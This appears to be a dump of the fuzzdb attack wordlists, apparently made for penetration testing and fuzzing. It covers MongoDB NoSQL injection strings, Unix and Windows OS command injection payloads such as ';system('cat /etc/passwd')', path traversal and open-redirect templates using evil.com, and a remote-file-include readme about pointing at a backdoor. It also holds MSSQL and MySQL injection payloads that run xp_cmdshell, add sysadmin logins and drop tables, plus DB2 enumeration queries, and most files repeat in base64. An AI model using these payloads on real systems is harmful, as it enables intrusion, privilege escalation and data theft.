16 | Thanks to https://github.com/cr0hn/nosqlinjection_wordlists for starting this wordlist
17 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/no-sql-injection/mongodb.txt:
--------------------------------------------------------------------------------
1 | true, $where: '1 == 1'
2 | , $where: '1 == 1'
3 | $where: '1 == 1'
4 | ', $where: '1 == 1'
5 | 1, $where: '1 == 1'
6 | { $ne: 1 }
7 | ', $or: [ {}, { 'a':'a
8 | ' } ], $comment:'successful MongoDB injection'
9 | db.injection.insert({success:1});
10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
11 | || 1==1
12 | ' && this.password.match(/.*/)//+%00
13 | ' && this.passwordzz.match(/.*/)//+%00
14 | '%20%26%26%20this.password.match(/.*/)//+%00
15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00
16 | {$gt: ''}
17 | [$ne]=1
18 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/no-sql-injection/mongodb.txt.base64:
--------------------------------------------------------------------------------
1 | dHJ1ZSwgJHdoZXJlOiAnMSA9PSAxJw0KLCAkd2hlcmU6ICcxID09IDEnDQokd2hlcmU6ICcxID09IDEnDQonLCAkd2hlcmU6ICcxID09IDEnDQoxLCAkd2hlcmU6ICcxID09IDEnDQp7ICRuZTogMSB9DQonLCAkb3I6IFsge30sIHsgJ2EnOidhDQonIH0gXSwgJGNvbW1lbnQ6J3N1Y2Nlc3NmdWwgTW9uZ29EQiBpbmplY3Rpb24nDQpkYi5pbmplY3Rpb24uaW5zZXJ0KHtzdWNjZXNzOjF9KTsNCmRiLmluamVjdGlvbi5pbnNlcnQoe3N1Y2Nlc3M6MX0pO3JldHVybiAxO2RiLnN0b3Jlcy5tYXBSZWR1Y2UoZnVuY3Rpb24oKSB7IHsgZW1pdCgxLDENCnx8IDE9PTENCicgJiYgdGhpcy5wYXNzd29yZC5tYXRjaCgvLiovKS8vKyUwMA0KJyAmJiB0aGlzLnBhc3N3b3JkenoubWF0Y2goLy4qLykvLyslMDANCiclMjAlMjYlMjYlMjB0aGlzLnBhc3N3b3JkLm1hdGNoKC8uKi8pLy8rJTAwDQonJTIwJTI2JTI2JTIwdGhpcy5wYXNzd29yZHp6Lm1hdGNoKC8uKi8pLy8rJTAwDQp7JGd0OiAnJ30NClskbmVdPTENCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/OSCommandInject.Windows.txt:
--------------------------------------------------------------------------------
1 | +|+Dir+c:\
2 | $+|+Dir+c:\
3 | %26%26+|+dir c:\
4 | $%26%26dir c:\
5 | %0a+dir+c:\
6 | +|+Dir+c:%255c
7 | $+|+Dir+c:%255c
8 | %26%26+|+dir c:%255c
9 | $%26%26dir+c:%255c
10 | %0a+dir+c:%255c
11 | +|+Dir+c:%2f
12 | $+|+Dir+c:%2f
13 | %26%26+|+dir c:%2f
14 | $%26%26dir+c:%2f
15 | %0a+dir+c:%2f
16 | +dir+c:\+|
17 | +|+dir+c:\+|
18 | +|+dir+c:%2f+|
19 | dir+c:\
20 | ||+dir|c:\
21 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/OSCommandInject.Windows.txt.base64:
--------------------------------------------------------------------------------
1 | K3wrRGlyK2M6XA0KJCt8K0RpcitjOlwNCiUyNiUyNit8K2RpciBjOlwNCiQlMjYlMjZkaXIgYzpcDQolMGErZGlyK2M6XA0KK3wrRGlyK2M6JTI1NWMNCiQrfCtEaXIrYzolMjU1Yw0KJTI2JTI2K3wrZGlyIGM6JTI1NWMNCiQlMjYlMjZkaXIrYzolMjU1Yw0KJTBhK2RpcitjOiUyNTVjDQorfCtEaXIrYzolMmYNCiQrfCtEaXIrYzolMmYNCiUyNiUyNit8K2RpciBjOiUyZg0KJCUyNiUyNmRpcitjOiUyZg0KJTBhK2RpcitjOiUyZg0KK2RpcitjOlwrfA0KK3wrZGlyK2M6XCt8DQorfCtkaXIrYzolMmYrfA0KZGlyK2M6XA0KfHwrZGlyfGM6XA0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/command-execution-unix.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 | /index.html|id|
4 | ;id;
5 | ;id
6 | ;netstat -a;
7 | ;id;
8 | |id
9 | |/usr/bin/id
10 | |id|
11 | |/usr/bin/id|
12 | ||/usr/bin/id|
13 | |id;
14 | ||/usr/bin/id;
15 | ;id|
16 | ;|/usr/bin/id|
17 | \n/bin/ls -al\n
18 | \n/usr/bin/id\n
19 | \nid\n
20 | \n/usr/bin/id;
21 | \nid;
22 | \n/usr/bin/id|
23 | \nid|
24 | ;/usr/bin/id\n
25 | ;id\n
26 | |usr/bin/id\n
27 | |nid\n
28 | `id`
29 | `/usr/bin/id`
30 | a);id
31 | a;id
32 | a);id;
33 | a;id;
34 | a);id|
35 | a;id|
36 | a)|id
37 | a|id
38 | a)|id;
39 | a|id
40 | |/bin/ls -al
41 | a);/usr/bin/id
42 | a;/usr/bin/id
43 | a);/usr/bin/id;
44 | a;/usr/bin/id;
45 | a);/usr/bin/id|
46 | a;/usr/bin/id|
47 | a)|/usr/bin/id
48 | a|/usr/bin/id
49 | a)|/usr/bin/id;
50 | a|/usr/bin/id
51 | ;system('cat%20/etc/passwd')
52 | ;system('id')
53 | ;system('/usr/bin/id')
54 | %0Acat%20/etc/passwd
55 | %0A/usr/bin/id
56 | %0Aid
57 | %0A/usr/bin/id%0A
58 | %0Aid%0A
59 | & ping -i 30 127.0.0.1 &
60 | & ping -n 30 127.0.0.1 &
61 | %0a ping -i 30 127.0.0.1 %0a
62 | `ping 127.0.0.1`
63 | | id
64 | & id
65 | ; id
66 | %0a id %0a
67 | `id`
68 | $;/usr/bin/id
69 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/command-injection-template.txt:
--------------------------------------------------------------------------------
1 | {cmd}
2 | ;{cmd}
3 | ;{cmd};
4 | ^{cmd}
5 | |{cmd}
6 | <{cmd}
7 | <{cmd};
8 | <{cmd}\n
9 | <{cmd}%0D
10 | <{cmd}%0A
11 | &{cmd}
12 | &{cmd}&
13 | &&{cmd}
14 | &&{cmd}&&
15 | %0D{cmd}
16 | %0D{cmd}%0D
17 | %0A{cmd}
18 | %0A{cmd}%0A
19 | \n{cmd}
20 | \n{cmd}\n
21 | '{cmd}'
22 | `{cmd}`
23 | ;{cmd}|
24 | ;{cmd}/n
25 | |{cmd};
26 | a);{cmd}
27 | a;{cmd}
28 | a);{cmd}
29 | a;{cmd};
30 | a);{cmd}|
31 | FAIL||{cmd}
32 | CMD=$'{cmd}';$CMD
33 | ;CMD=$'{cmd}';$CMD
34 | ^CMD=$'{cmd}';$CMD
35 | |CMD=$'{cmd}';$CMD
36 | &CMD=$'{cmd}';$CMD
37 | &&CMD=$'{cmd}';$CMD
38 | %0DCMD=$'{cmd}';$CMD
39 | FAIL||CMD=$'{cmd}';$CMD
40 | CMD=$\'{cmd}\';$CMD
41 | ;CMD=$\'{cmd}\';$CMD
42 | ^CMD=$\'{cmd}\';$CMD
43 | |CMD=$\'{cmd}\';$CMD
44 | &CMD=$\'{cmd}\';$CMD
45 | &&CMD=$\'{cmd}\';$CMD
46 | %0DCMD=$\'{cmd}\';$CMD
47 | FAIL||CMD=$\'{cmd}\';$CMD
48 | CMD=$"{cmd}";$CMD
49 | ;CMD=$"{cmd}";$CMD
50 | ^CMD=$"{cmd}";$CMD
51 | |CMD=$"{cmd}";$CMD
52 | &CMD=$"{cmd}";$CMD
53 | &&CMD=$"{cmd}";$CMD
54 | %0DCMD=$"{cmd}";$CMD
55 | FAIL||CMD=$"{cmd}";$CMD
56 |
57 | ;system('{cmd}')
58 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/command-injection-template.txt.base64:
--------------------------------------------------------------------------------
1 | e2NtZH0NCjt7Y21kfQ0KO3tjbWR9Ow0KXntjbWR9DQp8e2NtZH0NCjx7Y21kfQ0KPHtjbWR9Ow0KPHtjbWR9XG4NCjx7Y21kfSUwRA0KPHtjbWR9JTBBDQome2NtZH0NCiZ7Y21kfSYNCiYme2NtZH0NCiYme2NtZH0mJg0KJTBEe2NtZH0NCiUwRHtjbWR9JTBEDQolMEF7Y21kfQ0KJTBBe2NtZH0lMEENClxue2NtZH0NClxue2NtZH1cbg0KJ3tjbWR9Jw0KYHtjbWR9YA0KO3tjbWR9fA0KO3tjbWR9L24NCnx7Y21kfTsNCmEpO3tjbWR9DQphO3tjbWR9DQphKTt7Y21kfQ0KYTt7Y21kfTsNCmEpO3tjbWR9fA0KRkFJTHx8e2NtZH0NCkNNRD0kJ3tjbWR9JzskQ01EDQo7Q01EPSQne2NtZH0nOyRDTUQNCl5DTUQ9JCd7Y21kfSc7JENNRA0KfENNRD0kJ3tjbWR9JzskQ01EDQomQ01EPSQne2NtZH0nOyRDTUQNCiYmQ01EPSQne2NtZH0nOyRDTUQNCiUwRENNRD0kJ3tjbWR9JzskQ01EDQpGQUlMfHxDTUQ9JCd7Y21kfSc7JENNRA0KQ01EPSRcJ3tjbWR9XCc7JENNRA0KO0NNRD0kXCd7Y21kfVwnOyRDTUQNCl5DTUQ9JFwne2NtZH1cJzskQ01EDQp8Q01EPSRcJ3tjbWR9XCc7JENNRA0KJkNNRD0kXCd7Y21kfVwnOyRDTUQNCiYmQ01EPSRcJ3tjbWR9XCc7JENNRA0KJTBEQ01EPSRcJ3tjbWR9XCc7JENNRA0KRkFJTHx8Q01EPSRcJ3tjbWR9XCc7JENNRA0KQ01EPSQie2NtZH0iOyRDTUQNCjtDTUQ9JCJ7Y21kfSI7JENNRA0KXkNNRD0kIntjbWR9IjskQ01EDQp8Q01EPSQie2NtZH0iOyRDTUQNCiZDTUQ9JCJ7Y21kfSI7JENNRA0KJiZDTUQ9JCJ7Y21kfSI7JENNRA0KJTBEQ01EPSQie2NtZH0iOyRDTUQNCkZBSUx8fENNRD0kIntjbWR9IjskQ01EDQo8IS0tI2V4ZWMgY21kPSJ7Y21kfSItLT4NCjtzeXN0ZW0oJ3tjbWR9JykNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/shell-delimiters.txt:
--------------------------------------------------------------------------------
1 | ;
2 | ^
3 | &
4 | &&
5 | |
6 | ||
7 | %0D
8 | %0A
9 | \n
10 | <
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/shell-delimiters.txt.base64:
--------------------------------------------------------------------------------
1 | Ow0KXg0KJg0KJiYNCnwNCnx8DQolMEQNCiUwQQ0KXG4NCjwNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/shell-operators.txt:
--------------------------------------------------------------------------------
1 | <
2 | >
3 | <<
4 | >>
5 | <>
6 | >|
7 | |
8 | ||
9 | &
10 | &&
11 | $
12 | ;
13 | &>
14 | &>>
15 | <<<
16 | >>>
17 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/shell-operators.txt.base64:
--------------------------------------------------------------------------------
1 | PA0KPg0KPDwNCj4+DQo8Pg0KPnwNCnwNCnx8DQomDQomJg0KJA0KOw0KJj4NCiY+Pg0KPDw8DQo+Pj4NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt:
--------------------------------------------------------------------------------
1 | ..%255c
2 | .%5c../..%5c
3 | /..%c0%9v../
4 | /..%c0%af../
5 | /..%255c..%255c
6 |
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt.base64:
--------------------------------------------------------------------------------
1 | Li4lMjU1Yw0KLiU1Yy4uLy4uJTVjDQovLi4lYzAlOXYuLi8NCi8uLiVjMCVhZi4uLw0KLy4uJTI1NWMuLiUyNTVjDQoNCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/useful-commands-unix.txt:
--------------------------------------------------------------------------------
1 | uname -n -s
2 | whoami
3 | pwd
4 | last
5 | cat /etc/passwd
6 | ls -la /tmp
7 | ls -la /home
8 | ping -i 30 127.0.0.1
9 | ping 127.0.0.1
10 | ping -n 30
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/useful-commands-unix.txt.base64:
--------------------------------------------------------------------------------
1 | dW5hbWUgLW4gLXMNCndob2FtaQ0KcHdkDQpsYXN0DQpjYXQgL2V0Yy9wYXNzd2QNCmxzIC1sYSAvdG1wDQpscyAtbGEgL2hvbWUNCnBpbmcgLWkgMzAgMTI3LjAuMC4xIA0KcGluZyAxMjcuMC4wLjENCnBpbmcgLW4gMzANCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/useful-commands-windows.txt:
--------------------------------------------------------------------------------
1 | ver
2 | chdir
3 | echo %USERNAME%
4 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-cmd-execution/useful-commands-windows.txt.base64:
--------------------------------------------------------------------------------
1 | dmVyDQpjaGRpcg0KZWNobyAlVVNFUk5BTUUlDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-dir-indexing/directory-indexing.txt:
--------------------------------------------------------------------------------
1 | ;dir
2 | `dir`
3 | |dir|
4 | |dir
5 | /%3f.jsp
6 | ?M=D
7 | ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
8 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/os-dir-indexing/directory-indexing.txt.base64:
--------------------------------------------------------------------------------
1 | O2Rpcg0KYGRpcmANCnxkaXJ8DQp8ZGlyDQovJTNmLmpzcA0KP009RA0KLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/path-traversal/README.md:
--------------------------------------------------------------------------------
1 |
2 | **traversals-8-deep-exotic-encoding.fuzz.txt**
3 |
4 | Use Regex to replace {FILE} with your target filename
5 |
6 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/path-traversal/path-traversal-windows.txt:
--------------------------------------------------------------------------------
1 | C:/inetpub/wwwroot/global.asa
2 | C:\inetpub\wwwroot\global.asa
3 | C:/boot.ini
4 | C:\boot.ini
5 | D:\inetpub\wwwroot\global.asa
6 | D:/inetpub/wwwroot/global.asa
7 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/path-traversal/path-traversal-windows.txt.base64:
--------------------------------------------------------------------------------
1 | QzovaW5ldHB1Yi93d3dyb290L2dsb2JhbC5hc2ENCkM6XGluZXRwdWJcd3d3cm9vdFxnbG9iYWwuYXNhDQpDOi9ib290LmluaQ0KQzpcYm9vdC5pbmkNCkQ6XGluZXRwdWJcd3d3cm9vdFxnbG9iYWwuYXNhDQpEOi9pbmV0cHViL3d3d3Jvb3QvZ2xvYmFsLmFzYQ0K
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/README.md:
--------------------------------------------------------------------------------
1 | * redirect-injection-template.txt
2 | * Patterns for injecting into a value for attempting to bypass many input validation filters that intended to only allow only relative links on the same origin.
3 | * redirect-urls-template.txt
4 | * URL patterns that commonly lead to open redirect.
5 |
6 | Usage:
7 | Replace {target} in files with ip or hostname and path, Examples:
8 | * evil.com
9 | * evil.com/badurl
10 | * 1.2.3.4
11 | * 134744072
12 |
13 | Testing techniques:
14 | Filter Bypass
15 | * If periods are being stripped by the filter so that evil.com becomes evilcom, try converting the ip address to decimal notation form.
16 | http://www.geektools.com/geektools-cgi/ipconv.cgi
17 | * Try URL-encoding the replacement value for {target}
18 | Other Issues
19 | * If redirect.injection.template.txt usage results in the server proxying a request to the injected URL and returning its contents instead of redirecting to it, explore how this could be used to explore the servers localhost ports for web services, protected systems in a DMZ, interact through GET requests/REST interfaces, etc.
20 |
21 | TODO
22 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/redirect-injection-template.txt:
--------------------------------------------------------------------------------
1 | {target}
2 | /{target}
3 | //{target}
4 | ///{target}
5 | ////{target}
6 | /\{target}
7 | %2f{target}
8 | %2f$2f{target}
9 | %2f{target}%2f%2f
10 | $2f%2f{target}%2f%2f
11 | %2f{target}//
12 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/redirect-injection-template.txt.base64:
--------------------------------------------------------------------------------
1 | e3RhcmdldH0NCi97dGFyZ2V0fQ0KLy97dGFyZ2V0fQ0KLy8ve3RhcmdldH0NCi8vLy97dGFyZ2V0fQ0KL1x7dGFyZ2V0fQ0KJTJme3RhcmdldH0NCiUyZiQyZnt0YXJnZXR9DQolMmZ7dGFyZ2V0fSUyZiUyZg0KJDJmJTJme3RhcmdldH0lMmYlMmYNCiUyZnt0YXJnZXR9Ly8NCg==
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/redirect-urls-template.txt:
--------------------------------------------------------------------------------
1 | ?url=http://{target}
2 | ?url=https://{target}
3 | ?next=http://{target}
4 | ?next=https://{target}
5 | ?url=http://{target}
6 | ?url=https://{target}
7 | ?url=http://{target}
8 | ?url=//{target}
9 | ?url=$2f%2f{target}
10 | ?next=//{target}
11 | ?next=$2f%2f{target}
12 | ?url=//{target}
13 | ?url=$2f%2f{target}
14 | ?url=//{target}
15 | /redirect/{target}
16 | /cgi-bin/redirect.cgi?{target}
17 | /out/{target}
18 | /out?{target}
19 | /out?/{target}
20 | /out?//{target}
21 | /out?/\{target}
22 | /out?///{target}
23 | ?view={target}
24 | ?view=/{target}
25 | ?view=//{target}
26 | ?view=/\{target}
27 | ?view=///{target}
28 | /login?to={target}
29 | /login?to=/{target}
30 | /login?to=//{target}
31 | /login?to=/\{target}
32 | /login?to=///{target}
33 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/redirect/redirect-urls-template.txt.base64:
--------------------------------------------------------------------------------
1 | P3VybD1odHRwOi8ve3RhcmdldH0NCj91cmw9aHR0cHM6Ly97dGFyZ2V0fQ0KP25leHQ9aHR0cDovL3t0YXJnZXR9DQo/bmV4dD1odHRwczovL3t0YXJnZXR9DQo/dXJsPWh0dHA6Ly97dGFyZ2V0fQ0KP3VybD1odHRwczovL3t0YXJnZXR9DQo/dXJsPWh0dHA6Ly97dGFyZ2V0fQ0KP3VybD0vL3t0YXJnZXR9DQo/dXJsPSQyZiUyZnt0YXJnZXR9DQo/bmV4dD0vL3t0YXJnZXR9DQo/bmV4dD0kMmYlMmZ7dGFyZ2V0fQ0KP3VybD0vL3t0YXJnZXR9DQo/dXJsPSQyZiUyZnt0YXJnZXR9DQo/dXJsPS8ve3RhcmdldH0NCi9yZWRpcmVjdC97dGFyZ2V0fQ0KL2NnaS1iaW4vcmVkaXJlY3QuY2dpP3t0YXJnZXR9DQovb3V0L3t0YXJnZXR9DQovb3V0P3t0YXJnZXR9DQovb3V0Py97dGFyZ2V0fQ0KL291dD8vL3t0YXJnZXR9DQovb3V0Py9ce3RhcmdldH0NCi9vdXQ/Ly8ve3RhcmdldH0NCj92aWV3PXt0YXJnZXR9DQo/dmlldz0ve3RhcmdldH0NCj92aWV3PS8ve3RhcmdldH0NCj92aWV3PS9ce3RhcmdldH0NCj92aWV3PS8vL3t0YXJnZXR9DQovbG9naW4/dG89e3RhcmdldH0NCi9sb2dpbj90bz0ve3RhcmdldH0NCi9sb2dpbj90bz0vL3t0YXJnZXR9DQovbG9naW4/dG89L1x7dGFyZ2V0fQ0KL2xvZ2luP3RvPS8vL3t0YXJnZXR9DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/rfi/README.md:
--------------------------------------------------------------------------------
1 | rfi.fuzz.txt
2 |
3 | Remote File Include scanning
4 |
5 | Compiled by RSnake 02/01/2010
6 |
7 | Mostly from milw0rm osvdb.org and elsewhere
8 |
9 | Change XXpathXX to the path of your backdoor.
10 | Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own XXpathXX URL:
11 |
12 | XXpathXX => http://www.example.com/hax.txt?
13 |
14 | see fuzzdb docs:
15 |
16 | /docs/attack-docs/rfi-cheatsheet.html
17 |
18 | Other tools:
19 |
20 | fimap http://code.google.com/p/fimap/
21 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/Generic_SQLI.txt:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/Generic_SQLI.txt.base64:
--------------------------------------------------------------------------------
1 | DQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MSSQL.txt:
--------------------------------------------------------------------------------
1 | '; exec master..xp_cmdshell 'ping 10.10.1.2'--
2 | 'create user name identified by 'pass123' --
3 | 'create user name identified by pass123 temporary tablespace temp default tablespace users;
4 | ' ; drop table temp --
5 | 'exec sp_addlogin 'name' , 'password' --
6 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' --
7 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
8 | ' grant connect to name; grant resource to name; --
9 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
10 | ' or 1=1 --
11 | ' union (select @@version) --
12 | ' union (select NULL, (select @@version)) --
13 | ' union (select NULL, NULL, (select @@version)) --
14 | ' union (select NULL, NULL, NULL, (select @@version)) --
15 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) --
16 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
17 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MSSQL_blind.txt:
--------------------------------------------------------------------------------
1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
9 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MSSQL_blind.txt.base64:
--------------------------------------------------------------------------------
1 | JzsgaWYgbm90KHN1YnN0cmluZygoc2VsZWN0IEBAdmVyc2lvbiksMjUsMSkgPD4gMCkgd2FpdGZvciBkZWxheSAnMDowOjInIC0tDQonOyBpZiBub3Qoc3Vic3RyaW5nKChzZWxlY3QgQEB2ZXJzaW9uKSwyNSwxKSA8PiA1KSB3YWl0Zm9yIGRlbGF5ICcwOjA6MicgLS0NCic7IGlmIG5vdChzdWJzdHJpbmcoKHNlbGVjdCBAQHZlcnNpb24pLDI1LDEpIDw+IDgpIHdhaXRmb3IgZGVsYXkgJzA6MDoyJyAtLQ0KJzsgaWYgbm90KHN1YnN0cmluZygoc2VsZWN0IEBAdmVyc2lvbiksMjQsMSkgPD4gMSkgd2FpdGZvciBkZWxheSAnMDowOjInIC0tDQonOyBpZiBub3Qoc2VsZWN0IHN5c3RlbV91c2VyKSA8PiAnc2EnIHdhaXRmb3IgZGVsYXkgJzA6MDoyJyAtLQ0KJzsgaWYgaXNfc3J2cm9sZW1lbWJlcignc3lzYWRtaW4nKSA+IDAgd2FpdGZvciBkZWxheSAnMDowOjInIC0tIA0KJzsgaWYgbm90KChzZWxlY3Qgc2VydmVycHJvcGVydHkoJ2lzaW50ZWdyYXRlZHNlY3VyaXR5b25seScpKSA8PiAxKSB3YWl0Zm9yIGRlbGF5ICcwOjA6MicgLS0NCic7IGlmIG5vdCgoc2VsZWN0IHNlcnZlcnByb3BlcnR5KCdpc2ludGVncmF0ZWRzZWN1cml0eW9ubHknKSkgPD4gMCkgd2FpdGZvciBkZWxheSAnMDowOjInIC0tDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MySQL.txt:
--------------------------------------------------------------------------------
1 | 1'1
2 | 1 exec sp_ (or exec xp_)
3 | 1 and 1=1
4 | 1' and 1=(select count(*) from tablenames); --
5 | 1 or 1=1
6 | 1' or '1'='1
7 | 1or1=1
8 | 1'or'1'='1
9 | fake@ema'or'il.nl'='il.nl
10 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MySQL.txt.base64:
--------------------------------------------------------------------------------
1 | MScxDQoxIGV4ZWMgc3BfIChvciBleGVjIHhwXykNCjEgYW5kIDE9MQ0KMScgYW5kIDE9KHNlbGVjdCBjb3VudCgqKSBmcm9tIHRhYmxlbmFtZXMpOyAtLQ0KMSBvciAxPTENCjEnIG9yICcxJz0nMQ0KMW9yMT0xDQoxJ29yJzEnPScxDQpmYWtlQGVtYSdvcidpbC5ubCc9J2lsLm5sDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MySQL_MSSQL.txt:
--------------------------------------------------------------------------------
1 | 1
2 | 1 and user_name() = 'dbo'
3 | \'; desc users; --
4 | 1\'1
5 | 1' and non_existant_table = '1
6 | ' or username is not NULL or username = '
7 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
8 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
9 | 1 uni/**/on select all from where
10 |
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/MySQL_MSSQL.txt.base64:
--------------------------------------------------------------------------------
1 | MQ0KMSBhbmQgdXNlcl9uYW1lKCkgPSAnZGJvJw0KXCc7IGRlc2MgdXNlcnM7IC0tDQoxXCcxDQoxJyBhbmQgbm9uX2V4aXN0YW50X3RhYmxlID0gJzENCicgb3IgdXNlcm5hbWUgaXMgbm90IE5VTEwgb3IgdXNlcm5hbWUgPSAnDQoxIGFuZCBhc2NpaShsb3dlcihzdWJzdHJpbmcoKHNlbGVjdCB0b3AgMSBuYW1lIGZyb20gc3lzb2JqZWN0cyB3aGVyZSB4dHlwZT0ndScpLCAxLCAxKSkpID4gMTE2DQoxIHVuaW9uIGFsbCBzZWxlY3QgMSwyLDMsNCw1LDYsbmFtZSBmcm9tIHN5c29iamVjdHMgd2hlcmUgeHR5cGUgPSAndScgLS0NCjEgdW5pLyoqL29uIHNlbGVjdCBhbGwgZnJvbSB3aGVyZQ0KDQo=
2 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/detect/README.md:
--------------------------------------------------------------------------------
1 |
2 | **MSSQL.fuzz.txt**
3 |
4 | you will need to customize/modify some of the values in the payload queries for best effect
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/README.md:
--------------------------------------------------------------------------------
1 |
2 | various useful post-exploitation commands
3 |
4 | **ms-sql-enumeration.fuzz.txt**
5 | * ms-sqli info disclosure payload fuzzfile
6 | * replace regex with your fuzzer for best results
7 | * run wireshark or tcpdump, look for incoming smb or icmp packets from victim
8 | * might need to terminate payloads with ;--
9 |
10 |
11 | **mysql-injection-login-bypass.fuzz.txt**
12 | * regex replace as many as you can with your fuzzer for best results:
13 | *
14 | * also try to brute force a list of possible usernames, including possile admin acct names
15 |
16 | **mysql-read-local-files.fuzz.txt**
17 | * mysql local file disclosure through sqli
18 | * fuzz interesting absolute filepath/filename into
19 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/db2-enumeration.txt:
--------------------------------------------------------------------------------
1 | select versionnumber, version_timestamp from sysibm.sysversions;
2 | select user from sysibm.sysdummy1;
3 | select session_user from sysibm.sysdummy1;
4 | select system_user from sysibm.sysdummy1;
5 | select current server from sysibm.sysdummy1;
6 | select name from sysibm.systables;
7 | select grantee from syscat.dbauth;
8 | select * from syscat.tabauth;
9 | select * from syscat.dbauth where grantee = current user;
10 | select * from syscat.tabauth where grantee = current user;
11 | select name, tbname, coltype from sysibm.syscolumns;
12 | SELECT schemaname FROM syscat.schemata;
13 |
--------------------------------------------------------------------------------
/Manipulations/Manipulations/fuzzdb/attack/sql-injection/exploit/db2-enumeration.txt.base64:
--------------------------------------------------------------------------------
